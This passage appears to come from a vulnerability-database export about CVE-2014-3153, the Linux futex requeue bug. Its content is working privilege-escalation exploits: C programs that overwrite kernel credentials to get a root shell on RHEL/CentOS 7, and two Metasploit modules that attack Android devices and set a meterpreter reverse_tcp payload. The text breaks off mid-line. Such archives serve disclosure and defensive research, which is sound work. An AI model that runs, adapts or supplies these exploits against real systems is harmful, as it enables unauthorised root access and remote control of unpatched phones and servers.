sizeof(waiter11)) {\r\n pmutex = NULL;\r\n } else {\r\n pmutex = waiter11.lock;\r\n }\r\n fix_rt_mutex_waiter_list(pmutex);\r\n \r\n pthread_cancel_immediately(th11_1);\r\n pthread_cancel_immediately(th11_2);\r\n \r\n pthread_cancel_immediately(th7);\r\n pthread_cancel_immediately(th6);\r\n close(clientfd);\r\n pthread_cancel_immediately(thread_client_to_setup_rt_waiter);\r\n \r\n exit(0);\r\n}\r\n \r\n#define MMAP_ADDR_BASE 0x0c000000\r\n#define MMAP_LEN 0x0c001000\r\n \r\nint main(int argc, char *argv[])\r\n{\r\n unsigned long mapped_address;\r\n void *waiter_plist;\r\n \r\n printf(\"CVE-2014-3153 exploit by Chen Kaiqu([email\u00a0protected])\\n\");\r\n \r\n main_pid = gettid();\r\n if(fork() == 0) {\r\n iov_base0 = (unsigned long)mmap((void *)0xb0000000, 0x10000, PROT_READ | PROT_WRITE | PROT_EXEC, /*MAP_POPULATE |*/ MAP_SHARED | MAP_FIXED | MAP_ANONYMOUS, -1, 0);\r\n if (iov_base0 < 0xb0000000) {\r\n printf(\"mmap failed?\\n\");\r\n return 1;\r\n }\r\n iov_len0 = 0x10000;\r\n \r\n iov_basex = (unsigned long)mmap((void *)MMAP_ADDR_BASE, MMAP_LEN, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_SHARED | MAP_FIXED | MAP_ANONYMOUS, -1, 0);\r\n if (iov_basex < MMAP_ADDR_BASE) {\r\n printf(\"mmap failed?\\n\");\r\n return 1;\r\n }\r\n iov_lenx = MMAP_LEN;\r\n \r\n waiter_plist = (void *)iov_basex + 0x400;\r\n pthread_create(&thread_client_to_setup_rt_waiter, NULL, client_to_setup_rt_waiter, waiter_plist);\r\n \r\n sockfd = server_for_setup_rt_waiter();\r\n if (sockfd < 0) {\r\n printf(\"Server failed\\n\");\r\n return 1;\r\n }\r\n \r\n if (!do_exploit(waiter_plist)) {\r\n return 1;\r\n }\r\n return 0;\r\n }\r\n \r\n while(getuid())\r\n usleep(100);\r\n execl(\"/bin/bash\", \"bin/bash\", NULL);\r\n return 0;\r\n}\n\n# 0day.today [2018-01-03] #", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/22925"}, {"lastseen": "2018-01-08T13:04:03", "description": "This Metasploit module exploits a bug in futex_requeue in the linux kernel. Any android phone with a kernel built before June 2014 should be vulnerable.", "edition": 2, "published": "2015-02-10T00:00:00", "type": "zdt", "title": "Android Futex Requeue Kernel Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-3153"], "modified": "2015-02-10T00:00:00", "id": "1337DAY-ID-23280", "href": "https://0day.today/exploit/description/23280", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n\r\nrequire 'msf/core'\r\nrequire 'rex'\r\n\r\nclass Metasploit4 < Msf::Exploit::Local\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Post::File\r\n include Msf::Post::Common\r\n\r\n def initialize(info={})\r\n super( update_info( info, {\r\n 'Name' => 'Android futex requeue kernel exploit',\r\n 'Description' => %q{\r\n This module exploits a bug in futex_requeue in the linux kernel.\r\n Any android phone with a kernel built before June 2014 should be vulnerable. \r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' => [\r\n 'Pinkie Pie', #discovery \r\n 'geohot', #towelroot\r\n 'timwr' #metasploit module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2014-3153' ],\r\n [ 'URL', 'http://tinyhack.com/2014/07/07/exploiting-the-futex-bug-and-uncovering-towelroot/' ],\r\n [ 'URL', 'http://blog.nativeflow.com/the-futex-vulnerability' ],\r\n ],\r\n 'SessionTypes' => [ 'meterpreter' ],\r\n 'Platform' => 'android',\r\n 'Targets' => [[ 'Automatic', { }]],\r\n 'Arch' => ARCH_DALVIK,\r\n 'DefaultOptions' =>\r\n {\r\n 'PAYLOAD' => 'android/meterpreter/reverse_tcp',\r\n },\r\n 'DefaultTarget' => 0\r\n }\r\n ))\r\n\r\n register_options([\r\n OptString.new(\"WritableDir\", [ true, \"Temporary directory to write files\", \"/data/local/tmp/\" ]),\r\n ], self.class)\r\n end\r\n\r\n def put_local_file(remotefile)\r\n localfile = File.join( Msf::Config.data_directory, \"exploits\", \"CVE-2014-3153.elf\" )\r\n data = File.read(localfile, {:mode => 'rb'})\r\n write_file(remotefile, data)\r\n end\r\n\r\n def exploit\r\n workingdir = session.fs.dir.getwd\r\n exploitfile = \"#{workingdir}/#{Rex::Text::rand_text_alpha_lower(5)}\"\r\n payloadfile = \"#{workingdir}/#{Rex::Text::rand_text_alpha_lower(5)}\"\r\n\r\n put_local_file(exploitfile)\r\n cmd_exec('/system/bin/chmod 700 ' + exploitfile)\r\n write_file(payloadfile, payload.raw)\r\n\r\n tmpdir = datastore['WritableDir']\r\n rootclassdir = \"#{tmpdir}#{Rex::Text::rand_text_alpha_lower(5)}\"\r\n rootpayload = \"#{tmpdir}#{Rex::Text::rand_text_alpha_lower(5)}.jar\"\r\n\r\n rootcmd = \" mkdir #{rootclassdir} && \"\r\n rootcmd += \"cd #{rootclassdir} && \"\r\n rootcmd += \"cp \" + payloadfile + \" #{rootpayload} && \"\r\n rootcmd += \"chmod 766 #{rootpayload} && \"\r\n rootcmd += \"dalvikvm -Xbootclasspath:/system/framework/core.jar -cp #{rootpayload} com.metasploit.stage.Payload\"\r\n \r\n process = session.sys.process.execute(exploitfile, rootcmd, {'Hidden' => true, 'Channelized' => true})\r\n process.channel.read\r\n end\r\n\r\nend\n\n# 0day.today [2018-01-08] #", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/23280"}], "metasploit": [{"lastseen": "2020-10-14T23:33:59", "description": "This module exploits a bug in futex_requeue in the Linux kernel, using similar techniques employed by the towelroot exploit. Any Android device with a kernel built before June 2014 is likely to be vulnerable.\n", "published": "2014-12-01T03:49:22", "type": "metasploit", "title": "Android 'Towelroot' Futex Requeue Kernel Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-3153"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/ANDROID/LOCAL/FUTEX_REQUEUE", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Common\n\n def initialize(info={})\n super( update_info( info, {\n 'Name' => \"Android 'Towelroot' Futex Requeue Kernel Exploit\",\n 'Description' => %q{\n This module exploits a bug in futex_requeue in the Linux kernel, using\n similar techniques employed by the towelroot exploit. Any Android device\n with a kernel built before June 2014 is likely to be vulnerable.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Pinkie Pie', # discovery\n 'geohot', # towelroot\n 'timwr' # metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2014-3153' ],\n [ 'URL', 'http://tinyhack.com/2014/07/07/exploiting-the-futex-bug-and-uncovering-towelroot/' ],\n [ 'URL', 'http://blog.nativeflow.com/the-futex-vulnerability' ],\n ],\n 'DisclosureDate' => '2014-05-03',\n 'SessionTypes' => [ 'meterpreter' ],\n 'Platform' => [ \"android\", \"linux\" ],\n 'Payload' => { 'Space' => 2048, },\n 'DefaultOptions' =>\n {\n 'WfsDelay' => 300,\n 'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp',\n },\n 'Notes' => {'AKA' => ['towelroot']},\n 'DefaultTarget' => 0,\n 'Targets' => [\n # Automatic targetting via getprop ro.build.model\n ['Automatic Targeting', { 'auto' => true }],\n\n # This is the default setting, Nexus 4, 5, 7, etc\n ['Default',\n {\n 'new_samsung' => false,\n 'iovstack' => 2,\n 'offset' => 0,\n 'force_remove' => false,\n }\n ],\n\n # Samsung devices, S3, S4, S5, etc\n ['New Samsung',\n {\n 'new_samsung' => true,\n 'iovstack' => 2,\n 'offset' => 7380,\n 'force_remove' => true,\n }\n ],\n\n # Older Samsung devices, e.g the Note 2\n ['Old Samsung',\n {\n 'new_samsung' => false,\n 'iovstack' => 1,\n 'offset' => 0,\n 'force_remove' => true,\n }\n ],\n\n # Samsung Galaxy Grand, etc\n ['Samsung Grand',\n {\n 'new_samsung' => false,\n 'iovstack' => 5,\n 'offset' => 0,\n 'force_remove' => true,\n }\n ],\n ],\n }\n ))\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n ]\n end\n\n def check\n os = cmd_exec(\"getprop ro.build.version.release\")\n unless Gem::Version.new(os) < Gem::Version.new('4.5.0')\n vprint_error \"Android version #{os} does not appear to be vulnerable\"\n return CheckCode::Safe\n end\n vprint_good \"Android version #{os} appears to be vulnerable\"\n\n CheckCode::Appears\n end\n\n def exploit\n unless [CheckCode::Detected, CheckCode::Appears].include? check\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if target['auto']\n product = cmd_exec(\"getprop ro.build.product\")\n fingerprint = cmd_exec(\"getprop ro.build.fingerprint\")\n print_status(\"Found device: #{product}\")\n print_status(\"Fingerprint: #{fingerprint}\")\n\n if [\n \"mako\",\n \"m7\",\n \"hammerhead\",\n \"grouper\",\n \"Y530-U00\",\n \"G6-U10\",\n \"g2\",\n \"w7n\",\n \"D2303\",\n \"cancro\",\n ].include? product\n my_target = targets[1] # Default\n elsif [\n \"klte\", # Samsung Galaxy S5\n \"jflte\",# Samsung Galaxy S4\n \"d2vzw\" # Samsung Galaxy S3 Verizon (SCH-I535 w/ android 4.4.2, kernel 3.4.0)\n ].include? product\n my_target = targets[2] # New Samsung\n elsif [\n \"t03g\",\n \"m0\",\n ].include? product\n my_target = targets[3] # Old Samsung\n elsif [\n \"baffinlite\",\n \"Vodafone_785\",\n ].include? product\n my_target = targets[4] # Samsung Grand\n else\n print_status(\"Could not automatically target #{product}\")\n my_target = targets[1] # Default\n end\n else\n my_target = target\n end\n\n print_status(\"Using target: #{my_target.name}\")\n\n local_file = File.join( Msf::Config.data_directory, \"exploits\", \"CVE-2014-3153.so\" )\n exploit_data = File.read(local_file, {:mode => 'rb'})\n\n # Substitute the exploit shellcode with our own\n space = payload_space\n payload_encoded = payload.encoded\n exploit_data.gsub!(\"\\x90\" * 4 + \"\\x00\" * (space - 4), payload_encoded + \"\\x90\" * (payload_encoded.length - space))\n\n # Apply the target config\n offsets = my_target.opts\n config_buf = [\n offsets['new_samsung'] ? -1 : 0,\n offsets['iovstack'].to_i,\n offsets['offset'].to_i,\n offsets['force_remove'] ? -1 : 0,\n ].pack('I4')\n exploit_data.gsub!(\"c0nfig\" + \"\\x00\" * 10, config_buf)\n\n workingdir = session.fs.dir.getwd\n remote_file = \"#{workingdir}/#{Rex::Text::rand_text_alpha_lower(5)}\"\n write_file(remote_file, exploit_data)\n\n print_status(\"Loading exploit library #{remote_file}\")\n session.core.load_library(\n 'LibraryFilePath' => local_file,\n 'TargetFilePath' => remote_file,\n 'UploadLibrary' => false,\n 'Extension' => false,\n 'SaveToDisk' => false\n )\n print_status(\"Loaded library #{remote_file}, deleting\")\n session.fs.file.rm(remote_file)\n print_status(\"Waiting #{datastore['WfsDelay']} seconds for payload\")\n end\nend\n\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/android/local/futex_requeue.rb"}], "exploitdb": [{"lastseen": "2016-02-04T01:09:57", "description": "Linux Kernel - libfutex - Local Root for RHEL/CentOS 7.0.1406. CVE-2014-3153. Local exploit for linux platform", "published": "2014-11-25T00:00:00", "type": "exploitdb", "title": "Linux Kernel - libfutex - Local Root for RHEL/CentOS 7.0.1406", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-3153"], "modified": "2014-11-25T00:00:00", "id": "EDB-ID:35370", "href": "https://www.exploit-db.com/exploits/35370/", "sourceData": "/*\r\n * CVE-2014-3153 exploit for RHEL/CentOS 7.0.1406\r\n * By Kaiqu Chen ( kaiquchen@163.com )\r\n * Based on libfutex and the expoilt for Android by GeoHot.\r\n *\r\n * Usage:\r\n * $gcc exploit.c -o exploit -lpthread\r\n * $./exploit\r\n *\r\n */\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n#include <stdbool.h>\r\n#include <pthread.h>\r\n#include <fcntl.h>\r\n#include <signal.h>\r\n#include <string.h>\r\n#include <errno.h>\r\n#include <linux/futex.h>\r\n#include <sys/socket.h>\r\n#include <sys/mman.h>\r\n#include <sys/syscall.h>\r\n#include <sys/resource.h>\r\n#include <arpa/inet.h>\r\n#include <netinet/in.h> \r\n#include <netinet/tcp.h> \r\n\r\n#define ARRAY_SIZE(a)\t(sizeof (a) / sizeof (*(a)))\r\n\r\n#define FUTEX_WAIT_REQUEUE_PI 11\r\n#define FUTEX_CMP_REQUEUE_PI 12\r\n#define USER_PRIO_BASE 120\r\n#define LOCAL_PORT 5551\r\n\r\n#define SIGNAL_HACK_KERNEL 12\r\n#define SIGNAL_THREAD_EXIT 10\r\n\r\n#define OFFSET_PID\t\t\t0x4A4 \r\n#define OFFSET_REAL_PARENT\t0x4B8\r\n#define OFFSET_CRED\t\t\t0x668\r\n\r\n#define SIZEOF_CRED\t\t\t160\r\n#define SIZEOF_TASK_STRUCT\t2912\r\n#define OFFSET_ADDR_LIMIT\t0x20\r\n\r\n#define PRIO_LIST_OFFSET\t8\t\r\n#define NODE_LIST_OFFSET\t(PRIO_LIST_OFFSET + sizeof(struct list_head))\r\n#define PRIO_LIST_TO_WAITER(list) (((void *)(list)) - PRIO_LIST_OFFSET)\r\n#define WAITER_TO_PRIO_LIST(waiter) (((void *)(waiter)) + PRIO_LIST_OFFSET)\r\n#define NODE_LIST_TO_WAITER(list) (((void *)(list)) - NODE_LIST_OFFSET)\r\n#define WAITER_TO_NODE_LIST(waiter) (((void *)(waiter)) + NODE_LIST_OFFSET)\r\n#define MUTEX_TO_PRIO_LIST(mutex) (((void *)(mutex)) + sizeof(long))\r\n#define MUTEX_TO_NODE_LIST(mutex) (((void *)(mutex)) + sizeof(long) + sizeof(struct list_head))\r\n\r\n////////////////////////////////////////////////////////////////////\r\nstruct task_struct;\r\n\r\nstruct thread_info {\r\n struct task_struct *task;\r\n void *exec_domain;\r\n int flags;\r\n int status;\r\n int cpu;\r\n int preempt_count;\r\n void *addr_limit;\r\n};\r\n\r\nstruct list_head {\r\n struct list_head *next;\r\n struct list_head *prev;\r\n};\r\n\r\nstruct plist_head {\r\n\tstruct list_head node_list;\r\n};\r\n\r\nstruct plist_node {\r\n int prio;\r\n struct list_head prio_list;\r\n struct list_head node_list;\r\n};\r\n\r\nstruct rt_mutex {\r\n\tunsigned long\t\twait_lock;\r\n\tstruct plist_head\twait_list;\r\n\tstruct task_struct\t*owner;\r\n};\r\n\r\nstruct rt_mutex_waiter {\r\n struct plist_node list_entry;\r\n struct plist_node pi_list_entry;\r\n struct task_struct *task;\r\n struct rt_mutex *lock;\r\n};\r\n\r\nstruct mmsghdr {\r\n struct msghdr msg_hdr;\r\n unsigned int msg_len;\r\n};\r\n\r\nstruct cred {\r\n\tint\tusage;\r\n\tint\tuid;\t\t/* real UID of the task */\r\n\tint\tgid;\t\t/* real GID of the task */\r\n\tint\tsuid;\t\t/* saved UID of the task */\r\n\tint\tsgid;\t\t/* saved GID of the task */\r\n\tint\teuid;\t\t/* effective UID of the task */\r\n\tint\tegid;\t\t/* effective GID of the task */\r\n\tint\tfsuid;\t\t/* UID for VFS ops */\r\n\tint\tfsgid;\t\t/* GID for VFS ops */\r\n};\r\n\r\n////////////////////////////////////////////////////////////////////\r\n\r\nstatic int swag = 0;\r\nstatic int swag2 = 0;\r\nstatic int main_pid;\r\n\r\nstatic pid_t waiter_thread_tid;\r\n\r\nstatic pthread_mutex_t hacked_lock;\r\nstatic pthread_cond_t hacked;\r\n\r\nstatic pthread_mutex_t done_lock;\r\nstatic pthread_cond_t done;\r\n\r\nstatic pthread_mutex_t is_thread_desched_lock;\r\nstatic pthread_cond_t is_thread_desched;\r\n\r\nstatic volatile int do_socket_tid_read = 0;\r\nstatic volatile int did_socket_tid_read = 0;\r\n\r\nstatic volatile int do_dm_tid_read = 0;\r\nstatic volatile int did_dm_tid_read = 0;\r\n\r\nstatic pid_t last_tid = 0;\r\n\r\nstatic volatile int_sync_time_out = 0;\r\n\r\nstruct thread_info thinfo;\r\nchar task_struct_buf[SIZEOF_TASK_STRUCT];\r\nstruct cred cred_buf;\r\n\r\nstruct thread_info *hack_thread_stack = NULL;\r\n\r\npthread_t thread_client_to_setup_rt_waiter;\r\n\r\nint listenfd;\r\nint sockfd;\r\nint clientfd;\r\n\r\n////////////////////////////////////////////////////////////////\r\nint gettid()\r\n{\r\n\treturn syscall(__NR_gettid);\r\n}\r\n\r\nssize_t read_pipe(void *kbuf, void *ubuf, size_t count) {\r\n\tint pipefd[2];\r\n\tssize_t len;\r\n\r\n\tpipe(pipefd);\r\n\r\n\tlen = write(pipefd[1], kbuf, count);\r\n\r\n\tif (len != count) {\r\n\t\tprintf(\"Thread %d failed in reading @ %p : %d %d\\n\", gettid(), kbuf, (int)len, errno);\r\n\t\twhile(1) { sleep(10); }\r\n\t}\r\n\r\n\tread(pipefd[0], ubuf, count);\r\n\r\n\tclose(pipefd[0]);\r\n\tclose(pipefd[1]);\r\n\r\n\treturn len;\r\n}\r\n\r\nssize_t write_pipe(void *kbuf, void *ubuf, size_t count) {\r\n\tint pipefd[2];\r\n\tssize_t len;\r\n\r\n\tpipe(pipefd);\r\n\r\n\twrite(pipefd[1], ubuf, count);\r\n\tlen = read(pipefd[0], kbuf, count);\r\n\r\n\tif (len != count) {\r\n\t\tprintf(\"Thread %d failed in writing @ %p : %d %d\\n\", gettid(), kbuf, (int)len, errno);\r\n\t\twhile(1) { sleep(10); }\r\n\t}\r\n\r\n\tclose(pipefd[0]);\r\n\tclose(pipefd[1]);\r\n\r\n\treturn len;\r\n}\r\n\r\nint pthread_cancel_immediately(pthread_t thid)\r\n{\r\n\tpthread_kill(thid, SIGNAL_THREAD_EXIT);\r\n\tpthread_join(thid, NULL);\r\n\treturn 0;\r\n}\r\n\r\nvoid set_addr_limit(void *sp)\r\n{\r\n\tlong newlimit = -1;\r\n\twrite_pipe(sp + OFFSET_ADDR_LIMIT, (void *)&newlimit, sizeof(long));\r\n}\r\n\r\nvoid set_cred(struct cred *kcred)\r\n{\r\n\tstruct cred cred_buf;\r\n\tint len;\r\n\r\n\tlen = read_pipe(kcred, &cred_buf, sizeof(cred_buf));\r\n\tcred_buf.uid = cred_buf.euid = cred_buf.suid = cred_buf.fsuid = 0;\r\n\tcred_buf.gid = cred_buf.egid = cred_buf.sgid = cred_buf.fsgid = 0;\r\n\tlen = write_pipe(kcred, &cred_buf, sizeof(cred_buf));\r\n}\r\n\r\nstruct rt_mutex_waiter *pwaiter11;\r\n\r\nvoid set_parent_cred(void *sp, int parent_tid)\r\n{\r\n\tint len;\r\n\tint tid;\r\n\tstruct task_struct *pparent;\r\n\tstruct cred *pcred;\r\n\t\r\n\tset_addr_limit(sp);\r\n\t\r\n\tlen = read_pipe(sp, &thinfo, sizeof(thinfo));\r\n\tif(len != sizeof(thinfo)) {\r\n\t\tprintf(\"Read %p error %d\\n\", sp, len);\r\n\t}\r\n\t\r\n\tvoid *ptask = thinfo.task;\r\n\tlen = read_pipe(ptask, task_struct_buf, SIZEOF_TASK_STRUCT);\r\n\ttid = *(int *)(task_struct_buf + OFFSET_PID);\r\n\r\n\twhile(tid != 0 && tid != parent_tid) {\r\n\t\tpparent = *(struct task_struct **)(task_struct_buf + OFFSET_REAL_PARENT);\r\n\t\tlen = read_pipe(pparent, task_struct_buf, SIZEOF_TASK_STRUCT);\r\n\t\ttid = *(int *)(task_struct_buf + OFFSET_PID);\r\n\t}\r\n\r\n\tif(tid == parent_tid) {\r\n\t\tpcred = *(struct cred **)(task_struct_buf + OFFSET_CRED);\r\n\t\tset_cred(pcred);\r\n\t} else\r\n\t\tprintf(\"Pid %d not found\\n\", parent_tid);\r\n\treturn;\r\n}\r\n\r\nstatic int read_voluntary_ctxt_switches(pid_t pid)\r\n{\r\n\tchar filename[256];\r\n\tFILE *fp;\r\n\tint vcscnt = -1;\r\n\r\n\tsprintf(filename, \"/proc/self/task/%d/status\", pid);\r\n\tfp = fopen(filename, \"rb\");\r\n\tif (fp) {\r\n\t\tchar filebuf[4096];\r\n\t\tchar *pdest;\r\n\t\tfread(filebuf, 1, sizeof filebuf, fp);\r\n\t\tpdest = strstr(filebuf, \"voluntary_ctxt_switches\");\r\n\t\tvcscnt = atoi(pdest + 0x19);\r\n\t\tfclose(fp);\r\n\t}\r\n\treturn vcscnt;\r\n}\r\n\r\nstatic void sync_timeout_task(int sig)\r\n{\r\n\tint_sync_time_out = 1;\r\n}\r\n\r\nstatic int sync_with_child_getchar(pid_t pid, int volatile *do_request, int volatile *did_request)\r\n{\r\n\twhile (*do_request == 0) { }\r\n\tprintf(\"Press RETURN after one second...\");\r\n\t*did_request = 1;\r\n\tgetchar();\r\n\treturn 0;\r\n}\r\n\r\nstatic int sync_with_child(pid_t pid, int volatile *do_request, int volatile *did_request)\r\n{\r\n\tstruct sigaction act;\r\n\tint vcscnt;\r\n\tint_sync_time_out = 0;\r\n\r\n\tact.sa_handler = sync_timeout_task;\r\n\tsigemptyset(&act.sa_mask);\r\n\tact.sa_flags = 0;\r\n\tact.sa_restorer = NULL;\r\n\tsigaction(SIGALRM, &act, NULL);\r\n\r\n\talarm(3);\r\n\twhile (*do_request == 0) {\r\n\t\tif (int_sync_time_out)\r\n\t\t\treturn -1;\r\n\t}\r\n\t\r\n\talarm(0);\r\n\tvcscnt = read_voluntary_ctxt_switches(pid);\r\n\t*did_request = 1;\r\n\twhile (read_voluntary_ctxt_switches(pid) != vcscnt + 1) {\r\n \tusleep(10);\r\n\t}\r\n\r\n\treturn 0;\r\n}\r\n\r\nstatic void sync_with_parent(int volatile *do_request, int volatile *did_request)\r\n{\r\n\t*do_request = 1;\r\n\twhile (*did_request == 0) { }\r\n}\r\n\r\nvoid fix_rt_mutex_waiter_list(struct rt_mutex *pmutex)\r\n{\r\n\tstruct rt_mutex_waiter *pwaiter6, *pwaiter7;\r\n\tstruct rt_mutex_waiter waiter6, waiter7;\r\n\tstruct rt_mutex mutex;\r\n\tif(!pmutex) \r\n\t\treturn;\r\n\tread_pipe(pmutex, &mutex, sizeof(mutex));\r\n\tpwaiter6 = NODE_LIST_TO_WAITER(mutex.wait_list.node_list.next);\r\n\tif(!pwaiter6) \r\n\t\treturn;\r\n\tread_pipe(pwaiter6, &waiter6, sizeof(waiter6));\r\n\tpwaiter7 = NODE_LIST_TO_WAITER(waiter6.list_entry.node_list.next);\r\n\tif(!pwaiter7) \r\n\t\treturn;\r\n\tread_pipe(pwaiter7, &waiter7, sizeof(waiter7));\r\n\t\r\n\twaiter6.list_entry.prio_list.prev = waiter6.list_entry.prio_list.next;\r\n\twaiter7.list_entry.prio_list.next = waiter7.list_entry.prio_list.prev;\r\n\tmutex.wait_list.node_list.prev = waiter6.list_entry.node_list.next;\r\n\twaiter7.list_entry.node_list.next = waiter6.list_entry.node_list.prev;\r\n\t\r\n\twrite_pipe(pmutex, &mutex, sizeof(mutex));\r\n\twrite_pipe(pwaiter6, &waiter6, sizeof(waiter6));\r\n\twrite_pipe(pwaiter7, &waiter7, sizeof(waiter7));\r\n}\r\n\r\nstatic void void_handler(int signum)\r\n{\r\n\tpthread_exit(0);\r\n}\r\n\r\nstatic void kernel_hack_task(int signum)\r\n{\r\n\tstruct rt_mutex *prt_mutex, rt_mutex;\r\n\tstruct rt_mutex_waiter rt_waiter11;\r\n\tint tid = syscall(__NR_gettid);\r\n\tint pid = getpid();\r\n\r\n\tset_parent_cred(hack_thread_stack, main_pid);\r\n\t\r\n\tread_pipe(pwaiter11, (void *)&rt_waiter11, sizeof(rt_waiter11));\r\n\t\r\n\tprt_mutex = rt_waiter11.lock;\r\n\tread_pipe(prt_mutex, (void *)&rt_mutex, sizeof(rt_mutex));\r\n\t\r\n\tvoid *ptask_struct = rt_mutex.owner;\r\n\tptask_struct = (void *)((long)ptask_struct & ~ 0xF);\r\n\tint len = read_pipe(ptask_struct, task_struct_buf, SIZEOF_TASK_STRUCT);\r\n\tint *ppid = (int *)(task_struct_buf + OFFSET_PID);\r\n\tvoid **pstack = (void **)&task_struct_buf[8];\r\n\tvoid *owner_sp = *pstack;\r\n\tset_addr_limit(owner_sp);\r\n\r\n\tpthread_mutex_lock(&hacked_lock);\r\n\tpthread_cond_signal(&hacked);\r\n\tpthread_mutex_unlock(&hacked_lock);\r\n}\r\n\r\nstatic void *call_futex_lock_pi_with_priority(void *arg)\r\n{\r\n\tint prio;\r\n\tstruct sigaction act;\r\n\tint ret;\r\n\t\r\n\tprio = (long)arg;\r\n\tlast_tid = syscall(__NR_gettid);\r\n\t\r\n\tpthread_mutex_lock(&is_thread_desched_lock);\r\n\tpthread_cond_signal(&is_thread_desched);\r\n\t\r\n\tact.sa_handler = void_handler;\r\n\tsigemptyset(&act.sa_mask);\r\n\tact.sa_flags = 0;\r\n\tact.sa_restorer = NULL;\r\n\tsigaction(SIGNAL_THREAD_EXIT, &act, NULL);\r\n\t\r\n\tact.sa_handler = kernel_hack_task;\r\n\tsigemptyset(&act.sa_mask);\r\n\tact.sa_flags = 0;\r\n\tact.sa_restorer = NULL;\r\n\tsigaction(SIGNAL_HACK_KERNEL, &act, NULL);\r\n\t\r\n\tsetpriority(PRIO_PROCESS, 0, prio);\r\n\t\r\n\tpthread_mutex_unlock(&is_thread_desched_lock);\r\n\t\r\n\tsync_with_parent(&do_dm_tid_read, &did_dm_tid_read);\r\n\t\r\n\tret = syscall(__NR_futex, &swag2, FUTEX_LOCK_PI, 1, 0, NULL, 0);\r\n\t\r\n\treturn NULL;\r\n}\r\n\r\nstatic pthread_t create_thread_do_futex_lock_pi_with_priority(int prio)\r\n{\r\n\tpthread_t th4;\r\n\tpid_t pid;\r\n\t\r\n\tdo_dm_tid_read = 0;\r\n\tdid_dm_tid_read = 0;\r\n\t\r\n\tpthread_mutex_lock(&is_thread_desched_lock);\r\n\tpthread_create(&th4, 0, call_futex_lock_pi_with_priority, (void *)(long)prio);\r\n\tpthread_cond_wait(&is_thread_desched, &is_thread_desched_lock);\r\n\t\r\n\tpid = last_tid;\r\n\t\r\n\tsync_with_child(pid, &do_dm_tid_read, &did_dm_tid_read);\r\n\t\r\n\tpthread_mutex_unlock(&is_thread_desched_lock);\r\n\t\r\n\treturn th4;\r\n}\r\n\r\nstatic int server_for_setup_rt_waiter(void)\r\n{\r\n\tint sockfd;\r\n\tint yes = 1;\r\n\tstruct sockaddr_in addr = {0};\r\n\t\r\n\tsockfd = socket(AF_INET, SOCK_STREAM, SOL_TCP);\r\n\t\r\n\tsetsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, (char *)&yes, sizeof(yes));\r\n\t\r\n\taddr.sin_family = AF_INET;\r\n\taddr.sin_port = htons(LOCAL_PORT);\r\n\taddr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);\r\n\tbind(sockfd, (struct sockaddr *)&addr, sizeof(addr));\r\n\t\r\n\tlisten(sockfd, 1);\r\n\tlistenfd = sockfd;\r\n\t\r\n\treturn accept(sockfd, NULL, NULL);\r\n}\r\n\r\nstatic int connect_server_socket(void)\r\n{\r\n\tint sockfd;\r\n\tstruct sockaddr_in addr = {0};\r\n\tint ret;\r\n\tint sock_buf_size;\r\n\t\r\n\tsockfd = socket(AF_INET, SOCK_STREAM, SOL_TCP);\r\n\tif (sockfd < 0) {\r\n\t\tprintf(\"socket failed\\n\");\r\n\t\tusleep(10);\r\n\t} else {\r\n\t\taddr.sin_family = AF_INET;\r\n\t\taddr.sin_port = htons(LOCAL_PORT);\r\n\t\taddr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);\r\n\t}\r\n\t\r\n\twhile (connect(sockfd, (struct sockaddr *)&addr, 16) < 0) {\r\n\t\tusleep(10);\r\n\t}\r\n\t\r\n\tsock_buf_size = 1;\r\n\tsetsockopt(sockfd, SOL_SOCKET, SO_SNDBUF, (char *)&sock_buf_size, sizeof(sock_buf_size));\r\n\t\r\n\treturn sockfd;\r\n}\r\n\r\nunsigned long iov_base0, iov_basex;\r\nsize_t iov_len0, iov_lenx;\r\n\r\nstatic void *client_to_setup_rt_waiter(void *waiter_plist)\r\n{\r\n\tint sockfd;\r\n\tstruct mmsghdr msgvec[1];\r\n\tstruct iovec msg_iov[8];\r\n\tunsigned long databuf[0x20];\r\n\tint i;\r\n\tint ret;\r\n\tstruct sigaction act;\r\n\t\r\n\tact.sa_handler = void_handler;\r\n\tsigemptyset(&act.sa_mask);\r\n\tact.sa_flags = 0;\r\n\tact.sa_restorer = NULL;\r\n\tsigaction(SIGNAL_THREAD_EXIT, &act, NULL);\r\n\t\r\n\twaiter_thread_tid = syscall(__NR_gettid);\r\n\tsetpriority(PRIO_PROCESS, 0, 12);\r\n\t\r\n\tsockfd = connect_server_socket();\r\n\tclientfd = sockfd;\r\n\t\r\n\tfor (i = 0; i < ARRAY_SIZE(databuf); i++) {\r\n\tdatabuf[i] = (unsigned 